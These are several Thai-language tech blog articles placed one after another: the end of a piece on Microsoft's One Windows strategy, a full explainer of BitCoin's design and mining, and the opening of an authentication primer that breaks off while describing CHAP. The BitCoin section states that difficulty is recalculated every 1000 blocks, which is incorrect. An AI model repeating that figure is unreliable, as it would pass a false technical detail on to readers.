มีข้อจำกัดหลายอย่างทำให้การพัฒนาแอพบน WP8 ไม่ง่ายนัก เพราะติดโน่นติดนี่เต็มไปหมด เส้นทางของ Windows Phone มาวนรอบครบสมบูรณ์ใน Windows Phone 8.1 (2014) ที่สามารถยัด WinRT ลงมาใส่ในอุปกรณ์พกพาได้สำเร็จ นักพัฒนาสามารถเขียนแอพที่รันบน Windows 8.x และ Windows Phone 8.1 ได้พร้อมกันแล้ว (ข่าวเก่า: [ไมโครซอฟท์เปิดตัว Universal Windows Apps พัฒนาครั้งเดียว รันได้ทั้ง Windows 8.1, Windows Phone 8.1, Xbox One](https://www.blognone.com/node/55020)) ### เส้นทางเบื้องหน้า One Windows มาถึงวันนี้ (สิงหาคม 2014) คงต้องบอกว่าไมโครซอฟท์เพิ่งปรับพื้นฐานสำหรับวิสัยทัศน์ One Windows สำเร็จ แต่ผลลัพธ์ของมันจะออกดอกออกผลเป็นอย่างไร คงต้องรอดู Windows รุ่นหน้ารหัส Threshold (ที่เราคาดว่ามันคงใช้ชื่อ Windows 9 แต่ก็ไม่มีอะไรแน่นอนหรอกนะครับ) ว่าจะออกมาหน้าตาเป็นอย่างไร อย่างไรก็ตาม ปัญหาของไมโครซอฟท์คงไม่ใช่เรื่องวิสัยทัศน์ว่าถูกต้องแค่ไหน เพราะถ้ามองย้อนกลับไป การรวม One Windows ยังไงก็เป็นเรื่องที่ถูกต้องและควรทำ ทั้งในมิติของผู้ใช้ นักพัฒนา และไมโครซอฟท์เอง เพราะมันเป็นการรวมทรัพยากรเข้าด้วยกันไม่ให้ซ้ำซ้อน ไม่ต้องเหนื่อยหลายรอบ และผู้ใช้เองก็ได้ประโยชน์ แต่ปัญหาของไมโครซอฟท์กลับเป็นเรื่องจังหวะและเวลา เพราะกว่าไมโครซอฟท์จะได้ฤกษ์ "ปรับปรุง" Windows ให้ทันสมัยโดยนับจาก Windows Phone 7 ก็ต้องรอถึงปี 2010 (iPhone ออกมาสามปี และ Android ออกมาสองปี) และกว่าไมโครซอฟท์จะรวมแพลตฟอร์มได้สมบูรณ์ ก็อาจต้องรอถึงปี 2015 กับ Threshold ซึ่งป่านนั้น คู่แข่งและตลาดก็เปลี่ยนไปจากเดิมมากแล้ว คำถามที่ยังไม่มีใครตอบได้ก็คือ One Windows ยังเกาะขบวนรถไฟทันหรือไม่ ไมโครซอฟท์ยังสามารถใช้ฐานผู้ใช้เดิมเป็นต้นทุน ผนวกกับวิสัยทัศน์ใหม่ โครงสร้างองค์กรใหม่ ซีอีโอใหม่ แล้วสร้างนวัตกรรมสุดเจ๋งที่แซงหน้าคู่แข่ง พลิกเกมได้สำเร็จ หรือจะกลายเป็นจุดสิ้นสุดของ Windows สายคอนซูเมอร์ และไมโครซอฟท์ต้องถอนตัวไปรักษาฐานที่มั่นในตลาดไอทีองค์กรแทน อีก 1-2 ปีเราน่าจะรู้กัน **อ้างอิง** - [Microsoft's Windows Phone 8 finally gets a 'real' Windows core](http://www.zdnet.com/blog/microsoft/microsofts-windows-phone-8-finally-gets-a-real-windows-core/12975) - ZDNet - [What 'one Windows' really means (and doesn't)](http://www.zdnet.com/what-one-windows-really-means-and-doesnt-7000031917/) - ZDNet
# BitCoin (อีกสักรอบ): การใช้งานและเหตุผลการออกแบบ เมื่อปีที่แล้วผมเขียน[บทความเรื่อง BitCoin](https://www.blognone.com/node/35180) ไปแล้วครั้งหนึ่งอธิบายถึงกระบวนการทำงานภายใน ช่วงนี้มีข่าว BitCoin กลับขึ้นมาอีกครั้งและคนจำนวนมากน่าจะสนใจกันมากขึ้นว่าตกลงแล้ว BitCoin มันคืออะไรกัน ผมกลับไปอ่านบทความเดิมแล้วคิดว่าน่าจะปรับปรุงให้อ่านง่ายขึ้นได้ เลยถือโอกาสกลับมาเขียนกันใหม่อีกรอบ **คำเตือน**: บทความนี้ยังคงเป็นบทความเชิงเทคนิค จะมีการอ้างถึงกระบวนการเข้ารหัสหลายๆ จุด หากไม่เข้าใจกระบวนการเข้ารหัสพื้นฐานแนะนำให้อ่านบทความ [กระบวนการแฮช](https://www.blognone.com/node/43630), [การสุ่มเลขในการเข้ารหัส](https://www.blognone.com/node/43969), และ[การเข้ารหัสแบบกุญแจไม่สมมาตร](https://www.blognone.com/node/45433)แล้วกลับมาอ่านอีกครั้ง ### เงินดิจิตอลไม่ใช่เรื่องแปลก ทุกวันนี้เราใช้เงินผ่านกระบวนการทางดิจิตอลเป็นเรื่องปกติ ตั้งแต่บัญชีธนาคาร, การโอนเงินออนไลน์, ระบบบัตรเดบิต, บัตรเครดิต ที่เราใช้ทุกวันนี้ล้วนยืนยันจำนวนเงินด้วยไฟล์ฐานข้อมูลของระบบธนาคารทั้งสิ้น ธนาคารไม่ได้เก็บเงินเป็นธนบัตรไว้ในตู้เซฟตามจำนวนเงินฝากที่มีอยู่จริง ในกรณีของประเทศไทย ข้อมูลธนาคารแห่งประเทศไทยระบุว่า เงินสดในประเทศไทยมีอยู่ประมาณ 1.5 ล้านล้านบาท ขณะที่เงินฝากนั้นมีปริมาณถึง 13 ล้านล้านบาท เงินจำนวนมากเป็นเพียงตัวเลขยืนยันว่าเราเป็นเจ้าของ แต่ธนาคารมีหน้าที่สำคัญคือการเก็บสถานะความเป็นเจ้าของเงินของแต่ละคนไว้ให้ครบถ้วน เมื่อเราถอนหรือโอนเงินออกจากบัญชี ธนาคารต้องตรวจสอบอย่างละเอียดว่าเรามีเงินอยู่ในบัญชีจริงหรือไม่ และเราไม่ได้ถอนเกินกว่าที่เรามี เมื่อเราสั่งจ่ายทางออนไลน์หรือใช้บัตรเดบิต ร้านค้าสามารถตรวจสอบกลับไปยังธนาคารได้ว่าเราจ่ายเงินตามที่เรามีอยู่จริงหรือไม่ และร้านค้าจะยืนยันได้เมื่อเห็นตัวเลขเงินเข้ามายังบัญชีของร้านค้าว่ามีเงินเข้ามาแล้วจริงๆ หน้าที่หลักของธนาคารคือการเก็บรักษาข้อมูลความเป็นเจ้าของของเงินในแต่ละบัญชี และเก็บล็อกของการโอนเงินเข้าออกบัญชีแต่ละบัญชีว่าโอนออกไปยังบัญชีใด (หรือถอนเป็นเงินสด) เมื่อไหร่ จำนวนเท่าใด ### BitCoin คือเรื่องของ Peer-to-Peer แม้ธนาคารจะทำหน้าที่ได้ดีเป็นส่วนใหญ่ แต่มีหลายกรณีที่ธนาคารทำหน้าที่ได้ไม่ดีนัก ประเทศที่ขาดเสถียรภาพอาจจะมีธนาคารทำออกนโยบายแปลกๆ เช่น การยึดเงินในบัญชี, การอายัดบัญชีที่รัฐบาลพอใจ, ตลอดจนการปล่อยเงินออกมาในระบบมากขึ้นทำให้เงินเฟ้อ, ธนาคารเองบางครั้งก็ยกเลิกการโอนได้ นักวิจัยนิรนามที่ใช้ชื่อ Satoshi Nakamoto ประกาศว่าเขากำลังออกแบบระบบเงินที่ไร้ศูนย์กลาง (decentralized) อย่างสมบูรณ์ และเปิดเผยการออกแบบทั้งหมดออกมาในปี 2009 ในชื่อ BitCoin การออกแบบทำให้ BitCoin มีคุณสมบัติพอที่จะทำหน้าที่แทนธนาคาร ได้แก่ 1. **สามารถเปิดบัญชีใหม่ได้** ทุกคนในระบบ BitCoin สามารถเปิดบัญชีใหม่ได้ด้วยตนเอง เป็นการสร้างกุญแจสาธารณะและกุญแจส่วนตัว กุญแจสาธารณะกลายเป็นหมายเลขบัญชีของแต่ละคน กุญแจส่วนตัวนี้สามารถใช้ยืนยันข้อความอะไรก็ได้ว่าเจ้าของบัญชีเป็นผู้ส่งความจริง 2. **ตรวจสอบจำนวนเงินของทุกบัญชีได้** เมื่อได้รับหมายเลขบัญชีมา เราสามารถเข้าดูฐานข้อมูลได้ทันทีว่ามีเงินในบัญชีนั้นๆ เท่าใด พอที่จะจ่ายค่าบริการหรือสินค้าให้กับเราหรือไม่ 3. **บันทึกการโอน** ทุกครั้งที่มีการโอน ข้อมูลการโอนจะถูกกระจายไปทั่วเครือข่ายให้ทุกคนรับรู้ร่วมกัน ### ฐานข้อมูลแบบไร้ศูนย์กลาง กระบวนการเก็บข้อมูลแบบไร้ศูนย์กลางนั้นแนวคิดง่ายๆ คือ การให้ทุกคนเก็บข้อมูลไว้ในเครื่องของตัวเองทุกคน (ทำไมเราคิดไม่ได้!!!) และรับข้อมูลใหม่เข้ามาอัพเดตตลอดเวลา ปัญหาสำคัญคือเมื่อมีคนสั่งจ่ายเงินครั้งหนึ่งในระบบไร้ศูนย์กลาง กระบวนการกระจายข้อมูลการสั่งจ่ายนั้นอาจจะใช้เวลานับสิบนาที ความล่าช้าเช่นนี้อาจจะทำให้คนจ่ายเงินที่ประสงค์ร้ายสั่งจ่ายเงินหลายครั้งในระหว่างที่ฐา่นข้อมูลของแต่ละคนยังอัพเดตไม่สำเร็จ ความผิดพลาดนี้เรียกว่า double-spending หรือการจ่ายเงินซ้ำซ้อน ในระบบไร้ศูนย์กลางเราไม่สามารถเชื่อใจคนใดคนหนึ่งในระบบว่าจะมีข้อมูลล่าสุดเสมอ ทุกคนอาจจะอ้างว่าตัวเองมีข้อมูลที่ใหม่กว่าคนอื่นได้ตลอดเวลาเพราะไม่มีศูนย์กลางคอยควบคุม ดังนั้นจึงต้องมีกระบวนการยืนยันว่าสถานะล่าสุดของฐานข้อมูลที่ทุกคนเห็นนั้นเป็นอย่างไร กระบวนการยืนยันสถานะนี้ต้องแน่ใจว่าทุกคนจะยอมรับร่วมกันเป็นชุดเดียว ### Block สิทธิแห่งการประกาศสถานะฐานข้อมูล กระบวนการ BitCoin ออกแบบให้ทุกคนในเครือข่ายสามารถรู้ได้ว่าสถานะล่าสุดของฐานข้อมูลเป็นอย่างไร โดยเปิดให้ทุกคนช่วยกัน "ยืนยัน" ความเปลี่ยนแปลงล่าสุดของฐานข้อมูล ผู้ต้องการช่วยยืนยันสถานะล่าสุดของฐานข้อมูลจะต้องรวบรวมคำสั่งโอนเงินที่กระจายอยู่ในเครือข่ายและยังไม่ได้รับการยืนยันลงฐานข้อมูล จากนั้นรวบเข้าด้วยกันเป็นไฟล์ที่เรียกว่าบล็อค (block) ตัวบล็อคจะประกอบด้วยรายการการโอนเงินในระบบจำนวนมาก พร้อมกับข้อมูลอื่นๆ เช่น เวลาที่รวบรวมข้อมูล, ค่าแฮชของค่าแฮชแต่ละรายการโอนในบล็อค, และเวอร์ชั่นล่าสุดของฐานข้อมูลก่อนที่จะประกาศบล็อคนี้ ระบบของ BitCoin ถูกออกแบบกฎให้การประกาศบล็อคใหม่ซึ่งจะอัพเดตฐานข้อมูลของทุกคนในระบบเป็นเรื่องยาก และใช้เวลานานประมาณ 10 นาทีแม้จะใช้เครื่องที่แรงที่สุดก็ตามที ระบบที่ Satoshi ออกแบบไว้นั้นคือมีข้อมูลฟิลด์หนึ่งในบล็อคเป็นค่า nonce ที่สามารถเปลี่ยนเป็นค่าอะไรก็ได้ แต่ต้องทำให้ค่าแฮชของส่วนหัวของบล็อค (block header) มีค่าน้อยกว่าค่าหนึ่ง ค่าที่กำหนดว่าค่าแฮชสุดท้ายต้องน้อยกว่าเท่าใดนั้น ระบุอยู่ใน ฟิลด์ difficulty ที่คำนวณใหม่ทุกๆ 1000 บล็อค โดยจะดูจากระยะเวลาคำนวณ 1000 บล็อคที่ผ่านมาแล้วคำนวณค่าใหม่ เนื่องจากทุกคนมีฐานข้อมูลเหมือนกัน หากทุกคนใช้สมการเดียวกันก็จะสามารถคำนวณค่าได้เท่ากัน หากมีคนที่ประกาศอัพเดตฐานข้อมูลโดยคำประกาศไม่ผ่านเงื่อนไขของ difficulty ก็จะไม่มีใครยอมรับการประกาศนั้น กระบวนการแฮชที่มีความปลอดภัยสูงเช่น SHA-256 นั้นเราไม่สามารถ "ออกแบบ" ข้อมูลให้ได้ค่าแฮชตรงหรือใกล้เคียงกับค่าที่เราต้องการได้ สื่งที่เราทำได้คือการค่อยๆ ปรับข้อมูลไปทีละนิดแล้วลองแฮช ในกรณีของ BitCoin เราจะต้องปรับค่า nonce ไปเรื่อยๆ เพื่อให้ได้ค่าแฮชของบล็อคตามที่กำหนดไว้ ยกตัวอย่างค่าแฮชของบล็อค 249675 นั้นมีค่า "000000000000002db552292eda7fd1772c058543da1a0bb41af06abd1c8edfeb" การจะหาข้อมูลให้ได้ค่าแฮชที่มีศูนย์นำหน้าขนาดนี้นับเป็นเรื่องยากมาก ทุกคนอาจลอง sha1sum ข้อมูลมั่วๆ ในเครื่องตัวเองให้ได้ศูนย์นำหน้าสักสิบหลักดูได้ เนื่องจากกระบวนการปรับค่า nonce และการคำนวณแฮชนั้นใช้เวลานาน การแข่งประกาศเวอร์ชั่นใหม่ของฐานข้อมูลจึงทำได้ยาก ไม่ใช่ว่าใครจะสามารถประกาศบล็อคใหม่ได้ ในกรณีที่มีการประกาศบล็อคใหม่ขึ้นมาสองบล็อคพร้อมกันแต่เป็นเลขเวอร์ชั่นเดียวกัน ทุกคนจะรอว่าบล็อคต่อไปที่ประกาศได้ก่อนจะเลือก "ต่อ" จากบล็อคใด หากมีการต่อเส้นทางที่ยาวกว่าก็จะถือว่าเส้นทางนั้นเป็นเส้นทางที่ถูกต้อง ฐานข้อมูลใน BitCoin จึงใช้เวลานานในการอัพเดต และแม้จะมีการประกาศอัพเดตแล้วบางครั้งก็มีการยกเลิกกลับได้ชั่วคราว กระบวนการจ่ายเงินจึงต้องรอว่าฐานข้อมูลของทุกคนอัพเดตตรงกันแล้วจริงหรือไม่ โดยทั่วไปแล้วหากมีการคำนวณบล็อคต่อกันไปแล้วประมาณ 6 บล็อคก็จะถือว่าทุกคนในเครือข่ายยอมรับตรงกัน ### ขุดเหมือง เพื่อยืนยันรายการ คำถามสำคัญคือ แล้วทำไมผู้คนจะต้องมาพยายามคำนวณค่าแฮชนับล้านๆ ครั้งเพื่อให้ได้ค่ายืนยันบล็อค ระบบของ BitCoin มีการให้ผลตอบแทนกับผู้คำนวณค่าแฮชนี้ได้สองรูปแบบ 1. ผู้ที่ยืนยันจะสามารถสร้างรายการ "มอบเงินให้ตัวเอง" ได้ตามจำนวนที่กำหนดไว้ โดยช่วงแรกจะกำหนดไว้ 50BTC และลดลงเรื่อยๆ ตามจำนวนบล็อคที่มากขึ้น 2. ผู้ที่โอนเงินออกจากบัญชี สามารถใส่ "ค่าธรรมเนียม" เอาไว้ในประกาศของตนเอง ระบุว่าใครก็ตามที่คำนวณบล็อคใหม่สำเร็จ โดยรวมเอารายการโอนนี้ไว้ในบล็อคด้วย จะสามารถโอนค่าธรรมเนียมส่วนนี้เข้าตัวเองได้ กระบวนการนี้ทำให้คนจำนวนหนึ่งที่ต้องการ ค่าธรรมเนียมและเงินที่สามารถโอนให้ตัวเองได้ พากันลงทุนสร้างเครื่องพิเศษแบบต่างๆ เพื่อนำมาคำนวณค่าแฮชเป็นการใหญ่กระบวนการนี้เรียกว่าการ "ขุดเหมือง" (mining) ในช่วงหลักกระบวนการคำนวณแฮชเหล่านี้ใช้พลังประมวลผลสูงมาก จากการที่ BitCoin เริ่มได้รับการยอมรับในตลาดมากขึ้นเรื่อยๆ มีคนลงทุนเป็นจำนวนมาก แต่ก็ยังไม่สามารถคำนวณบล็อคก่อนคนอื่นๆ ได้ ซึ่งทำให้ความพยายามคำนวณแข่งนั้นสูญเปล่าไป คนเหล่านี้จึงรวมตัวกันแล้วแบ่งงานกันทำกลายเป็นคลัสเตอร์ประมวลผลขนาดใหญ่ที่มีพลังประมวลผลสูง เรียกว่า mining pool ทุกวันนี้การคำนวณบล็อคใหม่ 75% มาจากการรวมกลุ่มเหล่านี้ การรวมกลุ่มเช่นนี้มีข้อดี คือ หากผู้ที่มีพลังประมวลผลไม่สูงนัก สามารถเข้าร่วมกับกลุ่มใดกลุ่มหนึ่ง แล้วคำนวณตามงานที่ได้รับมอบหมาย หากในกลุ่มมีคนใดคนหนึ่งคำนวณสำเร็จก็ได้จะ BitCoin เข้าบัญชีผู้ดูแลกลุ่ม ผู้ดูแลมักจะแบ่งเงินให้ทุกคนในกลุ่มตามสัดส่วนพลังประมวลผล ก็จะได้เงินเป็นส่วนเล็กๆ ของตัวเองได้ ตัวอย่างเช่น [BitCoin.cz](https://mining.bitcoin.cz/) จะแบ่ง BitCoin ทั้งหมดที่ได้รับให้กับสมาชิกที่ช่วยคำนวณโดยคิดค่าจัดการ 2% กระบวนการขุดเหมืองนี้นอกจากจะสร้างแรงจูงใจให้กับผู้ที่เข้ามาคำนวณบล็อคแล้ว ยังช่วยเพิ่มปริมาณเงินในระบบขึ้นไปเรื่อยๆ ได้ด้วย แต่ระบบ BitCoin นั้นระบุกฎไว้ให้เงินที่เกิดใหม่นี้ค่อยๆ ลดลงเรื่อยๆ จนหยุดไปในที่สุด และเงิน BitCoin ทั้งโลกจะมีปริมาณจำกัด ### ความปลอดภัย แม้จะออกแบบจากฐานของระบบการเข้ารหัสที่ซับซ้อน แต่ BitCoin ก็ยังถูกโจมตีได้ในหลายรูปแบบ รูปแบบหนึ่งที่เคยเกิดขึ้นมาแล้วคือหากมี BitCoin รวมกันที่บัญชีใดมากๆ แล้วเกิดบัญชีนั้นๆ เก็บรักษาไม่ดี เช่น มีการฝาก BitCoin ไว้กับบริษัทรับฝากซึ่งรวมเข้าไว้เป็นบัญชีเดียว แต่ปรากฎว่าฐานข้อมูลของบริษัทนั้นถูกแฮ็ก ก็ทำให้เสียเงินไปได้ ปัญหาอีกประการหนึ่งคือซอฟต์แวร์ BitCoin สร้างจากแนวคิดว่าทุกคนต้องอยู่บนกฎที่ตรงกันเสมอ หากมีซอฟต์แวร์ที่ใช้กฎไม่ตรงกันก็ทำให้เกิดฐานข้อมูลหลายเวอร์ชั่นพร้อมกัน ซึ่งผิดจากความพยายามออกแบบตั้งแต่ต้นไป ประเด็นนี้เคยเกิดขึ้นเมื่อ [BitCoin อัพเดตซอฟต์แวร์เป็นเวอร์ชั่น 0.8 แล้วมีบั๊ก](https://node/41940) อีกประการหนึ่ง คือ โดยการออกแบบเอง จะยกอำนาจให้กับผู้ที่คำนวณบล็อคใหม่ได้ สามารถเลือกบันทึกรายการใดหรือไม่บันทึกก็ไ้ด หากมีคนที่มีพลังประมวลผลสูงมากๆ จนคนอื่นในโลกไม่สามารถแข่งขันได้ คนนั้นจะเข้าควบคุมระบบ BitCoin สามารถเลือกแบนบัญชีบางบัญชีไม่ยอมโอนเงินให้ หรือย้อนกลับฐานข้อมูลเพื่อจ่ายเงินซ้ำอีกครั้งได้ ### การใช้งานจริง ในโลกความเป็นจริงเราไม่ต้องไป "ขุดเหมือง" เพื่อให้ได้เงินมา มีบริการรับแลกเงินจำนวนมากเปิดให้เราจ่ายเงินเป็นเงินสกุลปกติในโลกเพื่อแลกกับ BitCoin เช่น กรณีของบริษัท [bitcoin.co.th ที่ต้องหยุดกิจการไปเพราะธนาคารแห่งประเทศไทยระบุว่าผิดกฎหมาย](https://www.blognone.com/node/46985) หรือบริษัทรับแลกเงินที่ดังมากๆ เช่น [Mt. Gox](https://www.mtgox.com/) บริษัทเหล่านี้มีจำนวนมากในโลก กระบวนการทำกำไรนั้นต่างกันไป บางบริษัททำหน้าที่เป็นเพียงนายหน้าให้คนทั่วไปเข้ามาส่งคำสั่งซื้อขายและเก็บค่าธรรมเนียมในฐานะตัวกลางเช่นเดียวกับตลาดหุ้น ทำให้ได้กำไรเสมอไม่ว่าจะมีคนซื้อหรือมีคนขาย ตัวอย่าง Camp BX แพลตฟอร์มแลกเงินแห่งหนึ่ง[เปิดให้ดูตารางคำเสนอซื้อขายได้ทั้งตาราง](https://campbx.com/depthtable.php) โดยราคาซื้อที่แพงที่สุดจะอยู่บนสุด และราคาเสนอขายที่ถูกที่สุดก็จะอยู่บนสุดเช่นกัน เมื่อได้เงินมาแล้วมีบริการจำนวนหนึ่งรับค่าสินค้าและบริการเป็นเงิน BitCoin (ดูรายการใน [BitCoin Wiki](https://en.bitcoin.it/wiki/Trade)) โดยส่วนมากจะเป็นบริการทางเว็บเช่น บริการ VPN, บริการเว็บโฮสติงค์ ### คำถามเจอบ่อย **ควรลงทุนขุด BitCoin ไหม** ความคุ้มค่าคงไม่มีใครตอบได้ แต่ทุกวันนี้คนที่จะคำนวณบล็อคได้ชนะ จะต้องมีพลังประมวลผลประมาณ 300 TH/s (สามร้อยล้านล้านแฮชต่อวินาที) เครื่องคอมพิวเตอร์ที่มีพลังประมวลผลขนาดนี้มีราคาแพง และกินพลังงานสูงมาก คนที่ลงทุนได้ควรมีความสามารถในการออปติไมซ์ราคาและพลังงานเป็นอย่างดี รวมถึงอาจจะอยู่ในโซนที่มีค่าไฟถูกกว่าคนอื่นๆ เพื่อความได้เปรียบ **ซื้อเก็บไว้ลงทุนดีไหม** (ถ้าผมรู้ว่าซื้อแล้วรวยแน่ก็คงไม่บอกอยู่ดี) กิจกรรมทางการเงินเกี่ยวกับ BitCoin ส่วนใหญ่ผิดกฎหมายไทย แม้จะมีคำถามว่าการ "โอน" เงินใน BitCoin นี้ถือเป็นการส่ง BitCoin ออกนอกประเทศได้หรือไม่จากลักษณะการทำงานแบบ P2P แต่กระบวนการแปลงเป็นเงินสดอย่างถูกกฎหมายก็ทำไม่ได้ในตอนนี้จนกว่าจะมีกระบวนการแน่ชัด ตอนนี้แค่ซื้อก็ผิดกฎหมายแล้ว ดังนั้นคงไม่มีใครแนะนำให้ลงทุน **มีเงินสกุลอื่นแบบเดียวกันอีกไหม** หลังจากที BitCoin ออกมาแล้ว มีกลุ่มคนที่อยาก "ปรับปรุง" BitCoin อีกจำนวนหนึ่ง ออกค่าเงินใหม่ออกมาโดยใช้การออกแบบ BitCoin เป็นฐาน เช่น [LiteCoin](https://litecoin.org/), [PPCoin](http://ppcoin.org/) โดยมีการปรับพารามิเตอร์และกระบวนการให้ต่างออกไปบ้าง **ถ้าซื้อขายไม่ได้ แล้วจะเขียนมาตั้งยาวให้อ่านทำไม** กระบวนการที่ Satoshi ออกแบบนับเป็นการออกแบบฐานข้อมูลแบบไร้ศูนย์กลางที่น่าสนใจ ทุกคนช่วยกันเก็บข้อมูลพร้อมกับช่วยกันยืนยันความ "ใหม่" ของข้อมูลตลอดเวลา แนวทางการออกแบบนี้เริ่มมีการนำไปใช้ในเทคโนโลยีอื่นๆ เช่น [NameCoin ที่สร้างฐานข้อมูล DNS แบบไร้ศูนย์กลาง](http://dot-bit.org/Main_Page)
# Authentication: รับรองว่าของจริง กระบวนการต่อเนื่องจากการระบุตัวตนแล้วโดยมากมักเป็นการรับรองตัวตนหรือ Authentication กระบวนการนี้เรามักทำอย่างไม่รู้ตัวกันตลอดเวลา เมื่อป้ายสินค้าชิ้นหนึ่งบอกชื่อสินค้าในห้างสรรพสินค้า เรามักตรวจสอบก่อนว่าสินค้าที่เรากำลังซื้อนั้นตรงกับสินค้าที่ป้ายบอกหรือไม่ หรือเมื่อเราพูดคุยกับใครสักคนทางโทรศัพท์ เมื่อเราได้ยินเสียงของคนที่เราคุยด้วยเราก็สามารถแน่ใจได้ว่าคนที่อยู่อีกฝั่งของคู่สายเป็นคนที่เราตั้งใจจะคุยด้วยจริงๆ เมื่อเราได้จดหมายของคนๆ หนึ่ง เราตรวจสอบดูว่ามีลายเซ็นหรือไม่ และลายเซ็นนั้นมีร่องรอยการปลอมแปลงหรือไม่ ขณะที่เราทำสิ่งต่างๆ เพื่อรับรองว่าบุคคล, เอกสาร, หรือสิ่งของ เป็นสิ่งที่เราตั้งใจจะ คุย, อ่าน, หรือใช้งาน กับสิ่งเหล่านั้นจริง สำหรับคอมพิวเตอร์แล้ว กระบวนการเหล่านี้จำเป็นจะต้องกำหนดกระบวนการล่วงหน้าไว้อย่างชัดเจน กระบวนการรับรองตัวตนโดยทั่วไป มักจำแนกการรับรองออกเป็นสามประเภท 1. เรารู้อะไร การรู้ความลับบางอย่างทำให้เราสามารถรับรองได้ว่าคนที่เรากำลังคุยอยู่ด้วยนั้นเป็นคนเราตั้งใจคุยจริงๆ ในละครเราอาจจะเห็นการถามถึงความหลังในวัยเด็ก ในทางคอมพิวเตอร์เราใช้รหัสผ่านที่เป็นความลับกันเสมอ 2. เรามีอะไร เครื่องยืนยันตัวตนเช่นบัตรประชาชน หรือบัตรเครดิตที่มีเฉพาะเจ้าของเท่านั้นที่มีอยู่ 3. เราเป็นอะไร สิ่งที่เราเป็นสามารถใช้ยืนยันตัวตนของเราได้ เช่น ลายนิ้วมือ, ดีเอ็นเอ หรือละครไทยยุคเก่าที่ยืนยันลูกที่พลัดพรากด้วยปานแดงที่แก้มก้นซ้ายก็ใช้กระบวนการนี้ กระบวนการเหล่านี้โดยทั่วไปแล้วเพียงกระบวนการใดกระบวนการหนึ่งก็เพียงพอสำหรับการรับรองตัวตน แต่เราต้องเชื่อว่ากระบวนการนั้นมีประสิทธิภาพจริง เช่น ต้องไม่มีใครสามารถปลอมบัตรประชาชนได้และต้องไม่มีใครขโมยบัตรประชาชนของเราไปใช้งาน หรือเราต้องไม่เผลอบอกรหัสผ่านให้ใครรู้ ในโลกความเป็นจริง ความผิดพลาดเหล่านี้เกิดขึ้นเสมอ เราอาจจะวางใจในเทคโนโลยีที่ผิด ทำให้เชื่อว่าบัตร RFID ที่ปลอมได้ง่ายนั้นไม่สามารถปลอมแปลงได้ เราอาจจะเป็นคนสะเพร่าตั้งรหัสผ่านเป็นวันเกิดหรือจดในสมุดโน้ตแล้ววางทิ้งไว้บนโต๊ะทำงาน ในกระบวนการที่ต้องการความน่าเชื่อถือสูงเช่นกระบวนการทางการเงินในสหรัฐฯ จึงมีคำแนะนำให้สถาบันทางการเงินรับรองตัวตนต้องใช้กระบวนการรับรองสองประเภทขึ้นไป เรียกกระบวนการนี้ว่า [multi-factor authentication](https://en.wikipedia.org/wiki/Multi-factor_authentication#Regulatory_definition) ### ข้อความลับ จุดเริ่มต้นแห่งการรับรอง กระบวนการตรวจสอบจากสิ่งที่เรา "รู้" นับเป็นกระบวนการเบื้องต้นที่สุดที่เราเคยทำกันมา เมื่อเราต้องเข้าเว็บสักเว็บ เว็บเหล่านั้นมักให้เรากำหนดรหัสผ่านเพื่อล็อกอินกันเป็นปกติ แนวคิดของรหัสผ่านคือเราเป็นคนเดียวที่จะรู้ว่าข้อความลับนั้นเป็นอะไร หากมีใครที่ใส่ข้อความลับแบบเดียวกับเรา เว็บและบริการต่างๆ ก็จะเชื่อว่าเราเป็นผู้ใช้ตัวจริงที่มาเข้าใช้บริการ ข้อความลับอาจจะใช้งานเป็นกลุ่มในกรณีเช่น ทหารในสมัยก่อนอาจจะมีการตกลงล่วงหน้าว่าหากเจอทหารไม่ทราบฝ่ายให้ตะโกนข้อความลับ หากได้คำตอบที่ถูกต้องแสดงว่าเป็นพวกเดียวกัน ในกรณีของสงครามโลกครั้งที่สอง มีการกำหนดให้ตะโกนว่า "flash" หากเจอทหารไม่ทราบฝ่ายและหากได้ยินต้องตะโกนกลับไปว่า " thunder" กระบวนการเก็บรหัสผ่านทุกวันนี้ในระบบคอมพิวเตอร์ได้รับการพัฒนาไปอย่างมาก ระบบใหม่ๆ มักป้องกันไม่ให้ใครล่วงรู้รหัสผ่านของผู้ใช้แม้แต่ผู้ดูแลระบบเองก็ตาม (อ่านบท[แฮช](https://www.blognone.com/node/43630)) ข้อความลับไม่ได้มีไว้เพื่อรับรองผู้ใช้เท่านั้น ทุกวันนี้บริการรับจ่ายเงินเช่น MasterCard เริ่มให้บริการ SecureCode ที่เมื่อสมัครครั้งแรกเราต้องกำหนดข้อความลับให้กับทาง MasterCard เอาไว้ (ในภาพคือช่อง Personal Greeting) หลังจากนั้น ทุกครั้งที่เราจ่ายเงิน เว็บที่จะรับจ่ายจะต้องนำเราไปยังหน้าเว็บของ MasterCard หน้าเว็บนั้นจะแสดงข้อความลับขึ้นมาเพื่อรับรองว่าเป็นเว็บของ MasterCard จริง ขณะเดียวกันก็ส่ง SMS มาให้เราเพื่อให้เราส่งข้อความจาก SMS กลับไปยังตัวเว็บ กระบวนการนี้ทำให้มีการรับรองตัวตนทั้งสองทาง คือเว็บรู้ว่าข้อความลับเป็นข้อความอะไร แสดงว่าเป็นเว็บจริง ขณะที่เรามีโทรศัพท์มือถือที่ลงทะเบียนเอาไว้จึงได้รับ SMS ที่ส่งมา แสดงว่าเราเป็นเจ้าของบัตรเครดิตนั้นจริง ### CHAP ใช้รหัสแต่ไม่ส่งรหัส กระบวนการใช้รหัสผ่านนั้นทำงานได้ดีต่อเมื่อช่องทางการสื่อสารไม่ถูกดักฟังได้โดยง่าย การสื่อสารยุคแรกๆ สายโทรศัพท์หรือการเชื่อมต่ออื่นๆ ล้วนมีคนเข้าใจในเทคโนโลยีไม่มากนัก ความเสี่ยงที่จะถูกดักฟังจึงไม่สูงมาก แต่เมื่อเทคโนโลยีเข้าถึงได้ง่ายขึ้นเรื่อยๆ กระบวนการดักฟังสัญญาณเหล่านี้ก็เป็นเรื่องง่ายมาก การดักฟังรหัสออกไปได้ทำให้ผู้ดักฟังสามารถนำรหัสผ่านที่ได้ไปล็อกอินเข้าสู่บริการในอนาคตต่อไป ความกังวลถึงการดักฟังเป็นความกังวลแรกๆ ของการเชื่อมต่ออินเทอร์เน็ต แนวทางแก้ปัญหาที่ออกแบบมาและยังนิยมใช้งานสูงจนทุกวันนี้คือกระบวนการ CAHP (Challenge-Handshake Authentication Protocol) กำหนดมาตรฐานไว้ใน [RFC1994](https://tools.ietf.org/html/rfc1994) กระบวนการนี้เซิร์ฟเวอร์จะสุ่มเอาข้อความที่ไม่ซ้ำกันเลยในแต่ละครั้ง ส่งไปยังผู้ใช้ เมื่อผู้ใช้ใส่รหัสผ่านคอมพิวเตอร์จะไม่ส่งรหัสผ่านกลับไปเซิร์ฟเวอร์โดยตรง 